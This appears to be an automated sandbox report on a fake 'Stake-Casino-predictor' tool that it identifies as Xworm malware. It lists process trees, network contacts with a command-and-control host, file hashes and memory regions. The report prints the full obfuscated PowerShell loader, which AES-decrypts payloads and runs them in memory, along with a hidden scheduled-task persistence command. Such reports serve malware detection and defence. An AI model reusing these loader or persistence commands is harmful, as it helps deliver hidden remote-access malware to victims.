c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat"
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('cw5mysSxxv94MpTM7jlgblINSn63B+9PWD7Ftom4KIA='); $aes_var.IV=[System.Convert]::FromBase64String('A7eONe+6zc8KLiE3Go1KFA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $iWuVc=New-Object System.IO.MemoryStream(,$param_var); $GLIRy=New-Object System.IO.MemoryStream; $GDSej=New-Object System.IO.Compression.GZipStream($iWuVc, [IO.Compression.CompressionMode]::Decompress); $GDSej.CopyTo($GLIRy); $GDSej.Dispose(); $iWuVc.Dispose(); $GLIRy.Dispose(); $GLIRy.ToArray();}function execute_function($param_var,$param2_var){ $rIVWz=[System.Reflection.Assembly]::Load([byte[]]$param_var); $IjLqc=$rIVWz.EntryPoint; $IjLqc.Invoke($null, $param2_var);}$uTCWP = 'C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat';$host.UI.RawUI.WindowTitle = $uTCWP;$sjvpk=[System.IO.File]::ReadAllText($uTCWP).Split([Environment]::NewLine);foreach ($lTTZJ in $sjvpk) { if ($lTTZJ.StartsWith('zfOTCBelgsnnDcnkPdZN')) { $SFdRM=$lTTZJ.Substring(20); break; }}$payloads_var=[string[]]$SFdRM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_397_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_397.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_397.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_397.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('cw5mysSxxv94MpTM7jlgblINSn63B+9PWD7Ftom4KIA='); $aes_var.IV=[System.Convert]::FromBase64String('A7eONe+6zc8KLiE3Go1KFA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $iWuVc=New-Object System.IO.MemoryStream(,$param_var); $GLIRy=New-Object System.IO.MemoryStream; $GDSej=New-Object System.IO.Compression.GZipStream($iWuVc, [IO.Compression.CompressionMode]::Decompress); $GDSej.CopyTo($GLIRy); $GDSej.Dispose(); $iWuVc.Dispose(); $GLIRy.Dispose(); $GLIRy.ToArray();}function execute_function($param_var,$param2_var){ $rIVWz=[System.Reflection.Assembly]::Load([byte[]]$param_var); $IjLqc=$rIVWz.EntryPoint; $IjLqc.Invoke($null, $param2_var);}$uTCWP = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_397.bat';$host.UI.RawUI.WindowTitle = $uTCWP;$sjvpk=[System.IO.File]::ReadAllText($uTCWP).Split([Environment]::NewLine);foreach ($lTTZJ in $sjvpk) { if ($lTTZJ.StartsWith('zfOTCBelgsnnDcnkPdZN')) { $SFdRM=$lTTZJ.Substring(20); break; }}$payloads_var=[string[]]$SFdRM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.ssl.com | udp |
| US | 35.168.131.169:80 | www.ssl.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.131.168.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.97.6.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | powershellcmd.theworkpc.com | udp |
| DE | 144.76.71.93:777 | powershellcmd.theworkpc.com | tcp |
| US | 8.8.8.8:53 | 93.71.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
memory/2368-1-0x00007FFDCCAC3000-0x00007FFDCCAC4000-memory.dmp
memory/2368-0-0x0000023F845B0000-0x0000023F845C0000-memory.dmp
memory/2368-2-0x0000023F849D0000-0x0000023F849F2000-memory.dmp
memory/2368-4-0x0000023F9ECF0000-0x0000023F9ED66000-memory.dmp
memory/2368-3-0x00007FFDCCAC0000-0x00007FFDCD4AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v5tdfphd.zve.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2368-29-0x00007FFDCCAC0000-0x00007FFDCD4AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe
| MD5 | 014f79448a036eefcfb2065dcad0d51c |
| SHA1 | 4ca8959526dc949edac260439b4a59144fbd8162 |
| SHA256 | e4118e2e86859a25ac4bccb4fb6c95a45c07f0bbe44621eb0228ffe40fd016e3 |
| SHA512 | b57603eeb9d0271b8f38d8a735b98decb4ae01b1f2835bc2b9026780d9ec617e3e8d6ba7398528520b5793deda2d675207de44b774be6d077d2952483b766358 |
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat
| MD5 | c7489479e3959c074892fab7e3ccb78c |
| SHA1 | fa1491e22997924ca0cf9fcab7be03a2db5c32e8 |
| SHA256 | 232ff2bec97a61d7efe72df1e64e397da5a2091b694930f02db0bdf0dabef9b7 |
| SHA512 | 99732c64853e7d14febdbeee14a3b06480ae485993fc9e487945ab1b55b006666702b96ef607e4bf6267d465a8253a2b3a6553ed0ddfbbb954fab966142d25e2 |
memory/3984-38-0x0000017BC35A0000-0x0000017BC35B0000-memory.dmp
memory/2368-36-0x00007FFDCCAC0000-0x00007FFDCD4AC000-memory.dmp
memory/3984-39-0x00007FFDCCAC0000-0x00007FFDCD4AC000-memory.dmp
memory/1540-70-0x000002F7DB8C0000-0x000002F7DB8FC000-memory.dmp
memory/1540-89-0x000002F7DB8B0000-0x000002F7DB8B8000-memory.dmp
memory/1540-90-0x000002F7DBB40000-0x000002F7DBB48000-memory.dmp
memory/1540-91-0x000002F7DBB50000-0x000002F7DBB86000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_397.vbs
| MD5 | 00ee0a8120244ffdec8aae021b48fdee |
| SHA1 | f8db4e932fcc77c6311bd05851b72ec98b508b5e |
| SHA256 | 9b404d8762949a92f097301a88de7dab5e5813bff0b787762434a67589ecd04c |
| SHA512 | 8697a5313e3038521e0054f704342d2cb88bfa5e735766bfdc6a6a85daad13eb29b4de8b93b1c2db319d3fdd1b3bb06f4bfd8c40ce3ba299829997a69ebeafe1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 0b518be7eddd45a6ee8b71904cf039ea |
| SHA1 | b3247b59f8f28a695698abdc7ff6bf6346df4d5d |
| SHA256 | e193e4e32d3f2c52a855feaa7b998057f19adabc53e86f62aaed9bc9ce347b46 |
| SHA512 | 460d4f9677ea2d19738625348f31226ff3e074618c2ca644730a4b502cadb20b1e94d62e2fa64e04861534d83ab56529bd8a28695000448daebe3ecaa9c3bf2c |
memory/3128-195-0x0000000000F20000-0x0000000000F4A000-memory.dmp
memory/800-192-0x000001A2ECD00000-0x000001A2ECD12000-memory.dmp
memory/3128-240-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1848-242-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1576-247-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/2396-251-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/896-260-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1724-259-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/2708-258-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1452-257-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/2416-256-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/2684-255-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1640-254-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/848-253-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1068-250-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/2472-249-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1112-252-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1732-248-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/2924-246-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/380-245-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1180-244-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1208-243-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/1560-241-0x00007FFDA8740000-0x00007FFDA8750000-memory.dmp
memory/3984-293-0x00007FFDCCAC0000-0x00007FFDCD4AC000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\248DDD9FCF61002E219645695E3FFC98_B65931808D21CEA247CFE7AD8A5650BC
| MD5 | 47e9cc35d47cc463e8376039ef8075ae |
| SHA1 | c5a2c058186a7b152c37110eb46d45595727f789 |
| SHA256 | 76a7509c8c9459db3ac3cf9bdbbd4b9790b01bbae75310210f035c098723701d |
| SHA512 | e478dbaeababf156b9b954d87c71c604fd435a7f28cbdbea80ea7a8c72a9ab82e4a39b1d94acfc9f05bb4a34f92a1c13a18efb822e754e1bd1fb4c74e58c2900 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07298EE8EBA9732300AE62BDCA6B6898
| MD5 | 6c18a429473b552edd38ca11f5c6be36 |
| SHA1 | 0583a13c144eb891b5e5f05d529373f6265749f6 |
| SHA256 | 9cda8dd2f61d244f631c413fe65ef3ab4a7e36ccc424407918601306e8ef1f4a |
| SHA512 | fa0209d2a265923951f9dc6b1c5450e5286950a652bd7aa4a861b2dcbb997681d8ae0c9c22029cd009dd5f80abd7c6f18865ed928fc0dc5b80fafaa13a039f58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
| MD5 | 5be18a31fb6aa4272aa80b05410b0777 |
| SHA1 | 82cb059227d55e3c8844692e08fd3453e535073e |
| SHA256 | 1ff276855d5d3e2489c93912793320a6d4db2e1d5ce7ebc4093108903610915a |
| SHA512 | ba8c3c9a5ff76f178dc4351bdf7c97581a2d33b8a1174a8a0752c10ef3a04be735c56441d344c94d6613f69ac8be65ccdc61eda728acb3210dbbb76e91515974 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1
| MD5 | 9f22625937448895abdcc9e1b73c1920 |
| SHA1 | df38cde41a2e2b6fafb563d2c464fff36c74971d |
| SHA256 | 49d098434b83599a56c9e3c413e5680a6668962841930102f026987fe8cc20aa |
| SHA512 | e65bb8a852e14b7a4f6fe8454da7c34e8e35d2e655d0fbfd48542cf83cac6ba6f2df5b2a8f9b130a084796100ea3a7fec6bbbafb178ac9edb0d155cd8a5687ad |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8555326CC9661C9937DC5053B6C38763
| MD5 | ca3751aba7207109a5e3405bf2266ab7 |
| SHA1 | 5e36b07b5da96c82a8c635c907e40f4602b6ab4f |
| SHA256 | 14aa0f17e6fcbcefa36d42358075a3dd798035e9ae46c80d39775e5a325f0cee |
| SHA512 | 55ebca54c044f58f1a6fdb2049c4a7e886f24d0c20f14fa2fa9469b962504a980043431dc4530312243477edfd7433e531dcdc8b68eea31ccb1566526afd39e9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 2d2a5957207184c5760ac488441e066d |
| SHA1 | eab36a5c718c202c5e99412c6b2dddda827ad738 |
| SHA256 | 1e7f8765412e67e4e379ab6d6c74408aacabd1a30b56b115dcd7cd907f23dc2a |
| SHA512 | c5c0ff305a8a72ff1249d39000fbc9cc24fac7069f6eaa0cf39983451e8ed373840a313b5fbe4769eb93554a313ca150b7d9b118925f58c148897d7ad130300f |
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win11-20240426-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat"
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('cw5mysSxxv94MpTM7jlgblINSn63B+9PWD7Ftom4KIA='); $aes_var.IV=[System.Convert]::FromBase64String('A7eONe+6zc8KLiE3Go1KFA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $iWuVc=New-Object System.IO.MemoryStream(,$param_var); $GLIRy=New-Object System.IO.MemoryStream; $GDSej=New-Object System.IO.Compression.GZipStream($iWuVc, [IO.Compression.CompressionMode]::Decompress); $GDSej.CopyTo($GLIRy); $GDSej.Dispose(); $iWuVc.Dispose(); $GLIRy.Dispose(); $GLIRy.ToArray();}function execute_function($param_var,$param2_var){ $rIVWz=[System.Reflection.Assembly]::Load([byte[]]$param_var); $IjLqc=$rIVWz.EntryPoint; $IjLqc.Invoke($null, $param2_var);}$uTCWP = 'C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat';$host.UI.RawUI.WindowTitle = $uTCWP;$sjvpk=[System.IO.File]::ReadAllText($uTCWP).Split([Environment]::NewLine);foreach ($lTTZJ in $sjvpk) { if ($lTTZJ.StartsWith('zfOTCBelgsnnDcnkPdZN')) { $SFdRM=$lTTZJ.Substring(20); break; }}$payloads_var=[string[]]$SFdRM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_682_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_682.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_682.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_682.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('cw5mysSxxv94MpTM7jlgblINSn63B+9PWD7Ftom4KIA='); $aes_var.IV=[System.Convert]::FromBase64String('A7eONe+6zc8KLiE3Go1KFA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $iWuVc=New-Object System.IO.MemoryStream(,$param_var); $GLIRy=New-Object System.IO.MemoryStream; $GDSej=New-Object System.IO.Compression.GZipStream($iWuVc, [IO.Compression.CompressionMode]::Decompress); $GDSej.CopyTo($GLIRy); $GDSej.Dispose(); $iWuVc.Dispose(); $GLIRy.Dispose(); $GLIRy.ToArray();}function execute_function($param_var,$param2_var){ $rIVWz=[System.Reflection.Assembly]::Load([byte[]]$param_var); $IjLqc=$rIVWz.EntryPoint; $IjLqc.Invoke($null, $param2_var);}$uTCWP = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_682.bat';$host.UI.RawUI.WindowTitle = $uTCWP;$sjvpk=[System.IO.File]::ReadAllText($uTCWP).Split([Environment]::NewLine);foreach ($lTTZJ in $sjvpk) { if ($lTTZJ.StartsWith('zfOTCBelgsnnDcnkPdZN')) { $SFdRM=$lTTZJ.Substring(20); break; }}$payloads_var=[string[]]$SFdRM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | powershellcmd.theworkpc.com | udp |
| DE | 144.76.71.93:777 | powershellcmd.theworkpc.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/3084-1-0x00007FF97A033000-0x00007FF97A035000-memory.dmp
memory/3084-0-0x0000028A64A10000-0x0000028A64A20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2jao5bfb.4oe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
